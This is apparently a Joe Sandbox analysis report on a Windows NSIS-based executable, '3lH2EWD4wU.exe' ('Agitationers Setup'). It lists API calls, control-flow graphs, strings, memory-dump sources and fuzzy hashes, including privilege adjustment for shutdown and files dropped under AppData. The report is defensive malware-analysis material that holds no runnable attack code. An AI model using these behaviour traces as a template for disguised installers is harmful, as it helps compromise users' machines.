                                                  • GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000006,00000008,0000000A), ref: 00403417
                                                  • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 00403428
                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403434
                                                  • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403448
                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403450
                                                  • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403461
                                                  • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403469
                                                  • DeleteFileA.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 0040347D
                                                    • Part of subcall function 00406338: GetModuleHandleA.KERNEL32(?,?,?,0040327F,0000000A), ref: 0040634A
                                                    • Part of subcall function 00406338: GetProcAddress.KERNEL32(00000000,?), ref: 00406365
                                                    • Part of subcall function 004037CE: lstrlenA.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank,1033,Agitationers Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Agitationers Setup: Completed,00000000,00000002,76233410), ref: 004038BE
                                                    • Part of subcall function 004037CE: lstrcmpiA.KERNEL32(?,.exe), ref: 004038D1
                                                    • Part of subcall function 004037CE: GetFileAttributesA.KERNEL32(: Completed), ref: 004038DC
                                                    • Part of subcall function 004037CE: LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank), ref: 00403925
                                                    • Part of subcall function 004037CE: RegisterClassA.USER32(0042EBA0), ref: 00403962
                                                    • Part of subcall function 004036F4: CloseHandle.KERNEL32(000002C8,0040352B,?,?,00000006,00000008,0000000A), ref: 004036FF
                                                  • OleUninitialize.OLE32(?,?,00000006,00000008,0000000A), ref: 0040352B
                                                  • ExitProcess.KERNEL32 ref: 0040354C
                                                  • GetCurrentProcess.KERNEL32(00000028,?,00000006,00000008,0000000A), ref: 00403669
                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00403670
                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403688
                                                  • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004036A7
                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 004036CB
                                                  • ExitProcess.KERNEL32 ref: 004036EE
                                                    • Part of subcall function 004056BC: MessageBoxIndirectA.USER32(0040A218), ref: 00405717
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd
                                                  Similarity
                                                  • API ID: Process$ExitFile$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
                                                  • String ID: "$"C:\Users\user\Desktop\3lH2EWD4wU.exe"$.tmp$1033$Agitationers Setup$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank$C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Stofnd$C:\Users\user\Desktop$C:\Users\user\Desktop\3lH2EWD4wU.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$Triu,fe$$UXTHEME$\Temp$`K$v$~nsu
                                                  • API String ID: 3776617018-454720022
                                                  • Opcode ID: aa8e0ef1eb72b8bc744683be083ef578b0b61129bd2ec06390cc6719ef15a54d
                                                  • Instruction ID: 947ab88924f8c3b38e2aea5cfaab7316d1dfac26a51a196f62222c0ed64aafcd
                                                  • Opcode Fuzzy Hash: aa8e0ef1eb72b8bc744683be083ef578b0b61129bd2ec06390cc6719ef15a54d
                                                  • Instruction Fuzzy Hash: EEC1D470604741AAD7216F759E89B2F3EACAF45706F44053FF581B61E2CB7C8A058B2E

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 134 405205-405221 135 4053b0-4053b6 134->135 136 405227-4052ee GetDlgItem * 3 call 404074 call 404965 GetClientRect GetSystemMetrics SendMessageA * 2 134->136 137 4053e0-4053ec 135->137 138 4053b8-4053da GetDlgItem CreateThread CloseHandle 135->138 154 4052f0-40530a SendMessageA * 2 136->154 155 40530c-40530f 136->155 141 40540e-405414 137->141 142 4053ee-4053f4 137->142 138->137 146 405416-40541c 141->146 147 405469-40546c 141->147 144 4053f6-405409 ShowWindow * 2 call 404074 142->144 145 40542f-405436 call 4040a6 142->145 144->141 158 40543b-40543f 145->158 151 405442-405452 ShowWindow 146->151 152 40541e-40542a call 404018 146->152 147->145 149 40546e-405474 147->149 149->145 156 405476-405489 SendMessageA 149->156 159 405462-405464 call 404018 151->159 160 405454-40545d call 4050c7 151->160 152->145 154->155 162 405311-40531d SendMessageA 155->162 163 40531f-405336 call 40403f 155->163 164 405586-405588 156->164 165 40548f-4054bb CreatePopupMenu call 405fc2 AppendMenuA 156->165 159->147 160->159 162->163 173 405338-40534c ShowWindow 163->173 174 40536c-40538d GetDlgItem SendMessageA 163->174 164->158 171 4054d0-4054e6 TrackPopupMenu 165->171 172 4054bd-4054cd GetWindowRect 165->172 171->164 175 4054ec-405506 171->175 172->171 176 40535b 173->176 177 40534e-405359 ShowWindow 173->177 174->164 178 405393-4053ab SendMessageA * 2 174->178 179 40550b-405526 SendMessageA 175->179 180 405361-405367 call 404074 176->180 177->180 178->164 179->179 181 405528-405548 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 179->181 180->174 183 40554a-40556a SendMessageA 181->183 183->183 184 40556c-405580 GlobalUnlock SetClipboardData CloseClipboard 183->184 184->164
                                                  APIs
                                                  • GetDlgItem.USER32(?,00000403), ref: 00405264
                                                  • GetDlgItem.USER32(?,000003EE), ref: 00405273
                                                  • GetClientRect.USER32(?,?), ref: 004052B0
                                                  • GetSystemMetrics.USER32(00000002), ref: 004052B7
                                                  • SendMessageA.USER32(?,0000101B,00000000,?), ref: 004052D8
                                                  • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004052E9
                                                  • SendMessageA.USER32(?,00001001,00000000,?), ref: 004052FC
                                                  • SendMessageA.USER32(?,00001026,00000000,?), ref: 0040530A
                                                  • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040531D
                                                  • ShowWindow.USER32(00000000,?,0000001B,?), ref: 0040533F
                                                  • ShowWindow.USER32(?,00000008), ref: 00405353
                                                  • GetDlgItem.USER32(?,000003EC), ref: 00405374
                                                  • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405384
                                                  • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040539D
                                                  • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004053A9
                                                  • GetDlgItem.USER32(?,000003F8), ref: 00405282
                                                    • Part of subcall function 00404074: SendMessageA.USER32(00000028,?,00000001,00403EA4), ref: 00404082
                                                  • GetDlgItem.USER32(?,000003EC), ref: 004053C5
                                                  • CreateThread.KERNELBASE(00000000,00000000,Function_00005199,00000000), ref: 004053D3
                                                  • CloseHandle.KERNELBASE(00000000), ref: 004053DA
                                                  • ShowWindow.USER32(00000000), ref: 004053FD
                                                  • ShowWindow.USER32(?,00000008), ref: 00405404
                                                  • ShowWindow.USER32(00000008), ref: 0040544A
                                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040547E
                                                  • CreatePopupMenu.USER32 ref: 0040548F
                                                  • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004054A4
                                                  • GetWindowRect.USER32(?,000000FF), ref: 004054C4
                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004054DD
                                                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405519
                                                  • OpenClipboard.USER32(00000000), ref: 00405529
                                                  • EmptyClipboard.USER32 ref: 0040552F
                                                  • GlobalAlloc.KERNEL32(00000042,?), ref: 00405538
                                                  • GlobalLock.KERNEL32(00000000), ref: 00405542
                                                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405556
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0040556F
                                                  • SetClipboardData.USER32(00000001,00000000), ref: 0040557A
                                                  • CloseClipboard.USER32 ref: 00405580
                                                  Strings
                                                  • Agitationers Setup: Completed, xrefs: 004054F5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                  • String ID: Agitationers Setup: Completed
                                                  • API String ID: 590372296-3562675674
                                                  • Opcode ID: 8d4fafd702a39b7bb38b3c828f48a19304575bcb563af6747f1ba819efe14e22
                                                  • Instruction ID: f54484deaadc53d59d965fa3ad24bc50442bab3dbb2bc57f5e3c058b1bd1a4dd
                                                  • Opcode Fuzzy Hash: 8d4fafd702a39b7bb38b3c828f48a19304575bcb563af6747f1ba819efe14e22
                                                  • Instruction Fuzzy Hash: 10A14871900608BFDB11AF61DE89AAF7F79FB08354F40403AFA41B61A0C7754E519F68
                                                  APIs
                                                  • FindFirstFileA.KERNELBASE(76233410,0042C0C0,0042BC78,00405A69,0042BC78,0042BC78,00000000,0042BC78,0042BC78,76233410,?,C:\Users\user\AppData\Local\Temp\,00405788,?,76233410,C:\Users\user\AppData\Local\Temp\), ref: 004062AE
                                                  • FindClose.KERNEL32(00000000), ref: 004062BA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd
                                                  Similarity
                                                  • API ID: Find$CloseFileFirst
                                                  • String ID:
                                                  • API String ID: 2295610775-0
                                                  • Opcode ID: f33084ac43254253387421f94672507a8f359bb84d60abe7f61aad8f4daa312f
                                                  • Instruction ID: 1e2c953ed1559e2f686ededff4fae2b078191910b4ed7f61f032671a7c701700
                                                  • Opcode Fuzzy Hash: f33084ac43254253387421f94672507a8f359bb84d60abe7f61aad8f4daa312f
                                                  • Instruction Fuzzy Hash: ACD01236519020ABC21027787E0C84B7A589F053347118A7BF4A6F21E0C7348C6686DC

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 185 403b6b-403b7d 186 403b83-403b89 185->186 187 403cbe-403ccd 185->187 186->187 188 403b8f-403b98 186->188 189 403d1c-403d31 187->189 190 403ccf-403d17 GetDlgItem * 2 call 40403f SetClassLongA call 40140b 187->190 191 403b9a-403ba7 SetWindowPos 188->191 192 403bad-403bb0 188->192 194 403d71-403d76 call 40408b 189->194 195 403d33-403d36 189->195 190->189 191->192 197 403bb2-403bc4 ShowWindow 192->197 198 403bca-403bd0 192->198 204 403d7b-403d96 194->204 200 403d38-403d43 call 401389 195->200 201 403d69-403d6b 195->201 197->198 205 403bd2-403be7 DestroyWindow 198->205 206 403bec-403bef 198->206 200->201 216 403d45-403d64 SendMessageA 200->216 201->194 203 40400c 201->203 211 40400e-404015 203->211 209 403d98-403d9a call 40140b 204->209 210 403d9f-403da5 204->210 212 403fe9-403fef 205->212 214 403bf1-403bfd SetWindowLongA 206->214 215 403c02-403c08 206->215 209->210 219 403fca-403fe3 DestroyWindow EndDialog 210->219 220 403dab-403db6 210->220 212->203 218 403ff1-403ff7 212->218 214->211 221 403cab-403cb9 call 4040a6 215->221 222 403c0e-403c1f GetDlgItem 215->222 216->211 218->203 226 403ff9-404002 ShowWindow 218->226 219->212 220->219 227 403dbc-403e09 call 405fc2 call 40403f * 3 GetDlgItem 220->227 221->211 223 403c21-403c38 SendMessageA IsWindowEnabled 222->223 224 403c3e-403c41 222->224 223->203 223->224 228 403c43-403c44 224->228 229 403c46-403c49 224->229 226->203 255 403e13-403e4f ShowWindow KiUserCallbackDispatcher call 404061 EnableWindow 227->255 256 403e0b-403e10 227->256 232 403c74-403c79 call 404018 228->232 233 403c57-403c5c 229->233 234 403c4b-403c51 229->234 232->221 236 403c92-403ca5 SendMessageA 233->236 238 403c5e-403c64 233->238 234->236 237 403c53-403c55 234->237 236->221 237->232 241 403c66-403c6c call 40140b 238->241 242 403c7b-403c84 call 40140b 238->242 253 403c72 241->253 242->221 251 403c86-403c90 242->251 251->253 253->232 259 403e51-403e52 255->259 260 403e54 255->260 256->255 261 403e56-403e84 GetSystemMenu EnableMenuItem SendMessageA 259->261 260->261 262 403e86-403e97 SendMessageA 261->262 263 403e99 261->263 264 403e9f-403ed9 call 404074 call 403b4c call 405fa0 lstrlenA call 405fc2 SetWindowTextA call 401389 262->264 263->264 264->204 275 403edf-403ee1 264->275 275->204 276 403ee7-403eeb 275->276 277 403f0a-403f1e DestroyWindow 276->277 278 403eed-403ef3 276->278 277->212 280 403f24-403f51 CreateDialogParamA 277->280 278->203 279 403ef9-403eff 278->279 279->204 281 403f05 279->281 280->212 282 403f57-403fae call 40403f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 280->282 281->203 282->203 287 403fb0-403fc3 ShowWindow call 40408b 282->287 289 403fc8 287->289 289->212
                                                  APIs
                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403BA7
                                                  • ShowWindow.USER32(?), ref: 00403BC4
                                                  • DestroyWindow.USER32 ref: 00403BD8
                                                  • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403BF4
                                                  • GetDlgItem.USER32(?,?), ref: 00403C15
                                                  • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403C29
                                                  • IsWindowEnabled.USER32(00000000), ref: 00403C30
                                                  • GetDlgItem.USER32(?,00000001), ref: 00403CDE
                                                  • GetDlgItem.USER32(?,00000002), ref: 00403CE8
                                                  • SetClassLongA.USER32(?,000000F2,?), ref: 00403D02
                                                  • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403D53
                                                  • GetDlgItem.USER32(?,00000003), ref: 00403DF9
                                                  • ShowWindow.USER32(00000000,?), ref: 00403E1A
                                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403E2C
                                                  • EnableWindow.USER32(?,?), ref: 00403E47
                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403E5D
                                                  • EnableMenuItem.USER32(00000000), ref: 00403E64
                                                  • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403E7C
                                                  • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403E8F
                                                  • lstrlenA.KERNEL32(Agitationers Setup: Completed,?,Agitationers Setup: Completed,00000000), ref: 00403EB9
                                                  • SetWindowTextA.USER32(?,Agitationers Setup: Completed), ref: 00403EC8
                                                  • ShowWindow.USER32(?,0000000A), ref: 00403FFC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd
                                                  Similarity
                                                  • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                  • String ID: Agitationers Setup: Completed
                                                  • API String ID: 3282139019-3562675674
                                                  • Opcode ID: d4f5cfe3c3c51a6681682eed2f77fa7a99c8bad0dac829668d753dca6044b2b8
                                                  • Instruction ID: 5f88be39a50f3dd075596c1c1d09af532afca629c850b085fe9e60943a8810da
                                                  • Opcode Fuzzy Hash: d4f5cfe3c3c51a6681682eed2f77fa7a99c8bad0dac829668d753dca6044b2b8
                                                  • Instruction Fuzzy Hash: B7C19171604605ABEB206F62DE45E2B3FBCEB4570AF40053EF642B11E1CB799942DB1D

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 290 4037ce-4037e6 call 406338 293 4037e8-4037f8 call 405efe 290->293 294 4037fa-40382b call 405e87 290->294 303 40384e-403877 call 403a93 call 405a26 293->303 299 403843-403849 lstrcatA 294->299 300 40382d-40383e call 405e87 294->300 299->303 300->299 308 40387d-403882 303->308 309 4038fe-403906 call 405a26 303->309 308->309 310 403884-4038a8 call 405e87 308->310 315 403914-403939 LoadImageA 309->315 316 403908-40390f call 405fc2 309->316 310->309 317 4038aa-4038ac 310->317 319 4039ba-4039c2 call 40140b 315->319 320 40393b-40396b RegisterClassA 315->320 316->315 321 4038bd-4038c9 lstrlenA 317->321 322 4038ae-4038bb call 405963 317->322 334 4039c4-4039c7 319->334 335 4039cc-4039d7 call 403a93 319->335 323 403971-4039b5 SystemParametersInfoA CreateWindowExA 320->323 324 403a89 320->324 328 4038f1-4038f9 call 405938 call 405fa0 321->328 329 4038cb-4038d9 lstrcmpiA 321->329 322->321 323->319 327 403a8b-403a92 324->327 328->309 329->328 333 4038db-4038e5 GetFileAttributesA 329->333 338 4038e7-4038e9 333->338 339 4038eb-4038ec call 40597f 333->339 334->327 343 403a60-403a61 call 405199 335->343 344 4039dd-4039f7 ShowWindow call 4062ca 335->344 338->328 338->339 339->328 347 403a66-403a68 343->347 351 403a03-403a15 GetClassInfoA 344->351 352 4039f9-4039fe call 4062ca 344->352 349 403a82-403a84 call 40140b 347->349 350 403a6a-403a70 347->350 349->324 350->334 353 403a76-403a7d call 40140b 350->353 356 403a17-403a27 GetClassInfoA RegisterClassA 351->356 357 403a2d-403a50 DialogBoxParamA call 40140b 351->357 352->351 353->334 356->357 361 403a55-403a5e call 40371e 357->361 361->327
                                                  APIs
                                                    • Part of subcall function 00406338: GetModuleHandleA.KERNEL32(?,?,?,0040327F,0000000A), ref: 0040634A
                                                    • Part of subcall function 00406338: GetProcAddress.KERNEL32(00000000,?), ref: 00406365
                                                  • lstrcatA.KERNEL32(1033,Agitationers Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Agitationers Setup: Completed,00000000,00000002,76233410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\3lH2EWD4wU.exe",00000000), ref: 00403849
                                                  • lstrlenA.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank,1033,Agitationers Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Agitationers Setup: Completed,00000000,00000002,76233410), ref: 004038BE
                                                  • lstrcmpiA.KERNEL32(?,.exe), ref: 004038D1
                                                  • GetFileAttributesA.KERNEL32(: Completed), ref: 004038DC
                                                  • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank), ref: 00403925
                                                    • Part of subcall function 00405EFE: wsprintfA.USER32 ref: 00405F0B
                                                  • RegisterClassA.USER32(0042EBA0), ref: 00403962
                                                  • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0040397A
                                                  • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 004039AF
                                                  • ShowWindow.USER32(00000005,00000000), ref: 004039E5
                                                  • GetClassInfoA.USER32(00000000,RichEdit20A,0042EBA0), ref: 00403A11
                                                  • GetClassInfoA.USER32(00000000,RichEdit,0042EBA0), ref: 00403A1E
                                                  • RegisterClassA.USER32(0042EBA0), ref: 00403A27
                                                  • DialogBoxParamA.USER32(?,00000000,00403B6B,00000000), ref: 00403A46
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd
                                                  Similarity
                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: "C:\Users\user\Desktop\3lH2EWD4wU.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$Agitationers Setup: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                  • API String ID: 1975747703-500145199
                                                  • Opcode ID: 28a6cb2043b9e6f93c7e77f288588c57623ef7bc68a152342dd55961b2cdd3aa
                                                  • Instruction ID: 8d2c68cc78653f9ce1e9d6bc3eacbdf8e43f68bf53c64efb99e72e2069adee56
                                                  • Opcode Fuzzy Hash: 28a6cb2043b9e6f93c7e77f288588c57623ef7bc68a152342dd55961b2cdd3aa
                                                  • Instruction Fuzzy Hash: BE61EA70340601BED620BB669D46F373EACEB54749F40447FF985B22E2CB7C59069A2D

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 364 402d63-402db1 GetTickCount GetModuleFileNameA call 405b39 367 402db3-402db8 364->367 368 402dbd-402deb call 405fa0 call 40597f call 405fa0 GetFileSize 364->368 369 402f95-402f99 367->369 376 402df1 368->376 377 402ed8-402ee6 call 402cff 368->377 379 402df6-402e0d 376->379 383 402ee8-402eeb 377->383 384 402f3b-402f40 377->384 381 402e11-402e1a call 4031ae 379->381 382 402e0f 379->382 390 402e20-402e27 381->390 391 402f42-402f4a call 402cff 381->391 382->381 386 402eed-402f05 call 4031c4 call 4031ae 383->386 387 402f0f-402f39 GlobalAlloc call 4031c4 call 402f9c 383->387 384->369 386->384 414 402f07-402f0d 386->414 387->384 412 402f4c-402f5d 387->412 396 402ea3-402ea7 390->396 397 402e29-402e3d call 405af4 390->397 391->384 401 402eb1-402eb7 396->401 402 402ea9-402eb0 call 402cff 396->402 397->401 411 402e3f-402e46 397->411 408 402ec6-402ed0 401->408 409 402eb9-402ec3 call 4063ef 401->409 402->401 408->379 413 402ed6 408->413 409->408 411->401 417 402e48-402e4f 411->417 418 402f65-402f6a 412->418 419 402f5f 412->419 413->377 414->384 414->387 417->401 420 402e51-402e58 417->420 421 402f6b-402f71 418->421 419->418 420->401 422 402e5a-402e61 420->422 421->421 423 402f73-402f8e SetFilePointer call 405af4 421->423 422->401 424 402e63-402e83 422->424 427 402f93 423->427 424->384 426 402e89-402e8d 424->426 428 402e95-402e9d 426->428 429 402e8f-402e93 426->429 427->369 428->401 430 402e9f-402ea1 428->430 429->413 429->428 430->401
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00402D74
                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\3lH2EWD4wU.exe,00000400), ref: 00402D90
                                                    • Part of subcall function 00405B39: GetFileAttributesA.KERNELBASE(00000003,00402DA3,C:\Users\user\Desktop\3lH2EWD4wU.exe,80000000,00000003), ref: 00405B3D
                                                    • Part of subcall function 00405B39: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B5F
                                                  • GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\3lH2EWD4wU.exe,C:\Users\user\Desktop\3lH2EWD4wU.exe,80000000,00000003), ref: 00402DDC
                                                  Strings
                                                  • C:\Users\user\Desktop\3lH2EWD4wU.exe, xrefs: 00402D7A, 00402D89, 00402D9D, 00402DBD
                                                  • soft, xrefs: 00402E51
                                                  • Inst, xrefs: 00402E48
                                                  • Error launching installer, xrefs: 00402DB3
                                                  • Null, xrefs: 00402E5A
                                                  • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402F3B
                                                  • C:\Users\user\Desktop, xrefs: 00402DBE, 00402DC3, 00402DC9
                                                  • "C:\Users\user\Desktop\3lH2EWD4wU.exe", xrefs: 00402D63
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00402D6A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
